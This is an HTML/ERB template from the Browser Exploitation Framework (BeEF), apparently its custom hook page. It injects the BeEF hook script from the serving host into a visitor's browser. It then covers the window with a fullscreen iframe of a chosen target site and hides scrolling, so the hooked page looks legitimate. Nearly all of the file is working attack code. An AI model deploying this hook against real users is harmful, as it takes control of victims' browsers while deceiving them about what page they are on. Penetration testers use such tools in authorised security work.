<!--
    Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
    Browser Exploitation Framework (BeEF) - http://beefproject.com
    See the file 'doc/COPYING' for copying permission
-->
<%
  @configuration = BeEF::Core::Configuration.instance
  hook_file = @configuration.get("beef.http.hook_file")
%>
<html>
<head>
	<title><%= @customhook_title %></title>
	<script>
		var commandModuleStr = '<script src="' + window.location.protocol + '//' + window.location.host + '<%= hook_file %>" type="text/javascript"><\/script>';
		document.write(commandModuleStr);
	</script>
</head>

<body>
	<script>
		setTimeout("beef.dom.createIframe('fullscreen', {'src':'<%= @customhook_target %>'},{},null)",2000);
		document.body.scroll = "no";
		document.documentElement.style.overflow = 'hidden';
		//Porco dio - and away we go!
	</script>
</body>
</html>
